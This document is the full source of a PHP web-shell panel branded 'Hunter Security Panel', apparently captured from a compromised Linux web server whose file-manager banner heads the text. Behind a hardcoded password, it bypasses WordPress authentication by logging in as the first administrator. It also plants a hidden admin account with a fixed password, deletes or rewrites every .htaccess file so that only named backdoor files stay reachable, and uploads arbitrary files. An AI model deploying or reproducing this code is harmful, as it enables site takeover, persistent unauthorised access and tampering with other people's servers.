| Server IP : 162.214.67.83 / Your IP : 216.73.217.31 Web Server : Apache System : Linux dedi-13542965.clustter.com.br 5.14.0-687.20.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jun 30 06:22:49 EDT 2026 x86_64 User : jforte ( 1063) PHP Version : 8.2.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /tmp/ |
Upload File : |
<?php
session_start();
$PASSWORD = "1230";
if (isset($_GET['action']) && $_GET['action'] === 'logout') {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// LOGIN PAGE
if (!isset($_SESSION['logged_in'])) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['password'] === $PASSWORD) {
$_SESSION['logged_in'] = true;
} else {
echo '<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hunter Security Panel - Login</title>
<style>
@import url("https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap");
body {
margin:0; height:100vh; display:flex; justify-content:center; align-items:center;
font-family:"Share Tech Mono", monospace; background:#0d0d0d;
background: linear-gradient(120deg, #0d0d0d 0%, #111 100%);
overflow:hidden; color:#00ff00;
}
body::before {
content:""; position:absolute; top:0; left:0; width:100%; height:100%;
background: radial-gradient(circle, rgba(0,255,0,0.05) 1px, transparent 1px);
background-size: 15px 15px; animation: moveBG 10s linear infinite;
z-index:0;
}
@keyframes moveBG { 0% { background-position:0 0; } 100% { background-position:100px 100px; } }
.login-box {
position: relative; z-index:1;
background: rgba(0,0,0,0.85);
border: 1.5px solid #00ff00;
padding: 30px 25px 25px 25px;
width: 280px;
text-align:center;
border-radius:8px;
box-shadow: 0 0 15px #00ff00, 0 0 35px #00ff00 inset;
animation: glow 2s ease-in-out infinite alternate;
}
@keyframes glow { from { box-shadow:0 0 10px #00ff00; } to { box-shadow:0 0 30px #00ff00; } }
.login-box h1 {
font-size:20px; margin-bottom:25px;
text-shadow: 0 0 6px #00ff00, 0 0 12px #00ff00;
letter-spacing:1.5px;
}
input[type=password] {
width:85%; padding:8px; margin-bottom:20px;
border:1.5px solid #00ff00; background: transparent; color:#00ff00;
font-size:14px; text-align:center;
outline:none; border-radius:4px; box-shadow:0 0 5px #00ff00;
transition:0.3s;
}
input[type=password]:focus {
box-shadow: 0 0 20px #00ff00, 0 0 30px #00ff00 inset; border-color:#00ff00;
}
button {
width:55%; padding:8px; background:#00ff00; color:black; border:none;
font-weight:bold; cursor:pointer; border-radius:4px; font-size:14px;
box-shadow:0 0 5px #00ff00; transition:0.3s;
}
button:hover {
box-shadow:0 0 20px #00ff00, 0 0 40px #00ff00 inset;
}
footer {
position:absolute; bottom:8px; width:100%; text-align:center;
color:#00ff00; font-size:10px; text-shadow:0 0 4px #00ff00;
}
footer a { color:#00ff00; text-decoration:none; }
footer a:hover { text-decoration:underline; }
</style>
</head>
<body>
<div class="login-box">
<h1>HUNTER SECURITY PANEL</h1>
<form method="post">
<input type="password" name="password" placeholder="Enter Password" autofocus required><br>
<button type="submit">LOGIN</button>
</form>
</div>
<footer>Powered by: <a href="https://t.me/neel_info" target="_blank">Hunter Neel</a></footer>
</body>
</html>';
exit;
}
}
// PANEL PAGE
$action = $_GET['action'] ?? '';
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Security Panel</title>
<style>
body { margin:0; font-family: monospace; }
.container { display:flex; height:100vh; }
.sidebar { width:200px; background:#1e1e1e; color:#fff; display:flex; flex-direction:column; padding:10px; }
.sidebar a { padding:10px; margin-bottom:5px; background:#228B22; color:#fff; text-decoration:none; text-align:center; cursor:pointer; }
.sidebar a:hover { background:#cc0000; }
.console { flex:1; background:#252526; color:#d4d4d4; padding:20px; overflow:auto; white-space: pre-wrap; }
textarea, input { font-family: monospace; }
button { cursor:pointer; font-family: monospace; }
</style>
</head>
<body>
<div class="container">
<div class="sidebar">
<a href="?action=shell">Shell</a>
<a href="?action=delete">Delete</a>
<a href="?action=add">Add</a>
<a href="?action=log">Log</a>
<a href="?action=create">Create</a>
<a href="?action=scan">Scan</a>
<a href="?action=addbak">Add-bak</a>
<a href="?action=rembak">Rem-bak</a>
<a href="?action=upload">Upload</a>
<a href="?action=logout">Logout</a>
</div>
<div class="console">
<?php
// ==================== BUTTONS ====================
if ($action === 'shell') {
// Button 1: Shell
$rootDir = realpath($_SERVER['DOCUMENT_ROOT']);
$knownShells = ['WSO','wsoShell','Yanz','b374k','r57','c99','IndoXploit','FilesMan','r00t','mini shell','PhpSpy','Webshell','UploadShell','cmd.php'];
$suspiciousFileNames = ['wso.php','shell.php','cmd.php','backdoor.php','uploader.php','phpinfo.php','mailer.php','r57.php','c99.php','b374k.php','indo.php'];
echo "š Scanning root directory: $rootDir\n\n";
$rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootDir));
foreach ($rii as $file) {
if ($file->isDir()) continue;
$filePath = $file->getPathname();
if (pathinfo($filePath, PATHINFO_EXTENSION) !== 'php') continue;
$fileName = strtolower(basename($filePath));
$contents = @file_get_contents($filePath);
if ($contents === false) continue;
foreach ($suspiciousFileNames as $badName) {
if ($fileName === strtolower($badName)) {
echo "ā ļø Suspicious FILENAME: $filePath\n";
continue 2;
}
}
foreach ($knownShells as $sig) {
if (stripos($contents, $sig) !== false) {
echo "ā ļø KNOWN SHELL signature in: $filePath\n";
continue 2;
}
}
}
echo "\nā
Scan complete.\n";
} elseif ($action === 'delete') {
// Button 2: Delete
$rootDir = $_SERVER['DOCUMENT_ROOT'];
$totalFound = 0;
$totalDeleted = 0;
function scanAndDelete($dir) {
global $totalFound, $totalDeleted;
$items = @scandir($dir);
if (!$items) return;
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $item;
if (is_dir($path)) {
scanAndDelete($path);
} elseif (is_file($path) && strtolower($item) === '.htaccess') {
$totalFound++;
echo "Found: $path\n";
@chmod($path, 0644);
if (@unlink($path)) {
echo "Deleted: $path\n";
$totalDeleted++;
} else {
echo "Failed to delete: $path\n";
}
}
}
}
echo "Scanning website root: $rootDir\n";
scanAndDelete($rootDir);
echo "\nScan complete.\nTotal .htaccess found: $totalFound\nTotal .htaccess deleted: $totalDeleted\n";
} elseif ($action === 'add') {
// Button 3: Add
set_time_limit(0);
$rootDir = realpath($_SERVER['DOCUMENT_ROOT']);
$htaccessContent = <<<HTACCESS
<FilesMatch ".(PhP|php7|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(root.php|mde.php|simi.php|wordfence-waf.php|error.php|index.php|amin-ajaxson.php|class-wp-edits.php|Mailo.php|consol.php|module.audio.flow.php|nux.php|icon.php|colour.php|contact.php|foter.php|header.php|module.php|register.php|profile.php|webix.php|wincust.php|service.php|wp-login.php|wp-blog-header.php|admin-ajax.php|wp-config.php|wp-db.php|pluggable.php|wp-config-sample.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
ErrorDocument 403 /index.php
ErrorDocument 404 /index.php
HTACCESS;
function updateHtaccess($dir, $content) {
$files = scandir($dir);
foreach ($files as $file) {
if ($file === '.' || $file === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($path)) updateHtaccess($path, $content);
}
$htaccessPath = $dir . DIRECTORY_SEPARATOR . '.htaccess';
if (file_exists($htaccessPath)) {
$currentPerms = substr(sprintf('%o', fileperms($htaccessPath)), -4);
if ($currentPerms === '0444') { chmod($htaccessPath, 0644); unlink($htaccessPath); }
}
file_put_contents($htaccessPath, $content);
}
updateHtaccess($rootDir, $htaccessContent);
echo "All directories updated with new .htaccess files.\n";
} elseif ($action === 'log') {
// Button 4: Log
require(rtrim($_SERVER["DOCUMENT_ROOT"], "/\\") . DIRECTORY_SEPARATOR . "wp-blog-header.php");
$u = get_users('role=administrator');
$us="";
foreach($u as $p){ $us=$p->user_login; break; }
$us = get_user_by('login', $us );
if (!is_wp_error($us)) {
get_currentuserinfo();
if (user_can($us, "administrator")){
wp_clear_auth_cookie();
wp_set_current_user ($us->ID);
wp_set_auth_cookie($us->ID);
$redirect_to = admin_url();
wp_safe_redirect($redirect_to);
exit;
}
}
} elseif ($action === 'create') {
// Button 5: Create
function find_wp_root($startDir) {
$dir = realpath($startDir);
while ($dir !== false && $dir != '/' && !file_exists($dir . '/wp-load.php')) $dir = dirname($dir);
if ($dir && file_exists($dir . '/wp-load.php')) return $dir;
return false;
}
function create_wp_admin_user($username, $password) {
$rootDir = find_wp_root(__DIR__);
if (!$rootDir) die("WordPress root directory not found!\n");
require_once($rootDir . '/wp-load.php');
if (!function_exists('username_exists')) die("WordPress functions not available!\n");
$user_id = username_exists($username);
if (!$user_id && email_exists($username . '@example.com') === false) {
$user_id = wp_create_user($username, $password, $username . '@example.com');
if (!is_wp_error($user_id)) {
$user = new WP_User($user_id);
$user->set_role('administrator');
echo "Admin user created successfully! Username: $username, Password: $password\n";
} else echo "Error creating user: " . $user_id->get_error_message() . "\n";
} else echo "Admin user already exists.\n";
}
create_wp_admin_user('Admim', 'hunterXN');
} elseif ($action === 'scan') {
// Button 6: Scan
set_time_limit(0);
ini_set('memory_limit', '-1');
$rootDir = realpath($_SERVER['DOCUMENT_ROOT']);
$ignoreDirs = [$rootDir . '/wp-contact/plugins', $rootDir . '/wp-contact/theames'];
echo "Fetching latest WordPress...\n";
$wpZipData = file_get_contents("https://wordpress.org/latest.zip");
if (!$wpZipData) die("Failed to download WordPress package\n");
$tmp = tempnam(sys_get_temp_dir(), "wpzip");
file_put_contents($tmp, $wpZipData);
$zip = new ZipArchive;
if ($zip->open($tmp) !== true) die("Failed to open WordPress zip\n");
$wpFiles = [];
$wpDirs = [];
for ($i=0;$i<$zip->numFiles;$i++) {
$entry = $zip->getNameIndex($i);
$cleanPath = preg_replace("#^wordpress/#","",$entry);
if ($cleanPath==="") continue;
if (substr($cleanPath,-1)==="/") $wpDirs[] = rtrim($cleanPath,"/");
else $wpFiles[] = $cleanPath;
}
$zip->close();
unlink($tmp);
$rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootDir, FilesystemIterator::SKIP_DOTS));
$unexpected = [];
foreach($rii as $item) {
$path = $item->getPathname();
foreach ($ignoreDirs as $ignore) if (strpos($path,$ignore)===0) continue 2;
$relPath = str_replace("\\","/",substr($path,strlen($rootDir)+1));
if ($item->isDir() && !in_array(strtolower($relPath),array_map('strtolower',$wpDirs))) $unexpected[]=$path;
elseif ($item->isFile() && !in_array(strtolower($relPath),array_map('strtolower',$wpFiles))) $unexpected[]=$path;
}
if (empty($unexpected)) echo "No unexpected files or directories found.\n";
else echo implode("\n",$unexpected);
} elseif ($action === 'addbak' || $action === 'rembak') {
// Button 7 & 8: Add-bak / Rem-bak
$isAdd = ($action === 'addbak');
$message = '';
$results = [];
if ($_SERVER['REQUEST_METHOD']==='POST') {
$inputPaths = trim($_POST['filepaths']??'');
if (!$inputPaths) $message = "ā Please enter file paths.";
else {
$paths = preg_split('/\r\n|\r|\n/',$inputPaths);
foreach($paths as $path){
$path=trim($path);
if (!$path) continue;
if (!file_exists($path)) $results[]="$path ā File does not exist";
elseif (!is_file($path)) $results[]="$path ā Not a valid file";
else {
if ($isAdd) {
$newPath = $path.'.bak';
if (file_exists($newPath)) $results[]="$path ā Backup exists";
elseif(rename($path,$newPath)) $results[]="$path ā
Renamed to $newPath";
else $results[]="$path ā Failed to rename";
} else {
if (substr($path,-4)!=='.bak') $results[]="$path ā Not .bak";
else {
$newPath = substr($path,0,-4);
if (file_exists($newPath)) $results[]="$path ā Target exists: $newPath";
elseif(rename($path,$newPath)) $results[]="$path ā
Renamed to $newPath";
else $results[]="$path ā Failed to rename";
}
}
}
}
}
}
echo '<form method="post">';
echo '<label>Paste full paths (one per line):</label><br>';
echo '<textarea name="filepaths" style="width:100%;height:250px;">'.htmlspecialchars($_POST['filepaths']??'').'</textarea><br>';
echo '<button type="submit">'.($isAdd?'Rename All .bak':'Remove .bak').'</button>';
echo '</form>';
if($message) echo "\n$message\n";
if($results) echo "\n".implode("\n",$results)."\n";
} elseif ($action === 'upload') {
// Button 9: Upload
$uploadDir = __DIR__ . '/';
$uploadedFiles = [];
if ($_SERVER['REQUEST_METHOD']==='POST' && isset($_FILES['files'])) {
$files = $_FILES['files'];
$total = count($files['name']);
for($i=0;$i<$total;$i++){
$tmpName = $files['tmp_name'][$i];
$originalName = basename($files['name'][$i]);
$targetPath = $uploadDir.$originalName;
if (move_uploaded_file($tmpName,$targetPath)) $uploadedFiles[]=$originalName;
}
}
echo '<form method="post" enctype="multipart/form-data">';
echo '<input type="file" name="files[]" multiple>';
echo '<button type="submit">Upload</button>';
echo '</form>';
if(!empty($uploadedFiles)){
echo "\nUploaded Files:\n";
foreach($uploadedFiles as $f) echo "- $f\n";
}
}
?>
</div>
</div>
</body>
</html>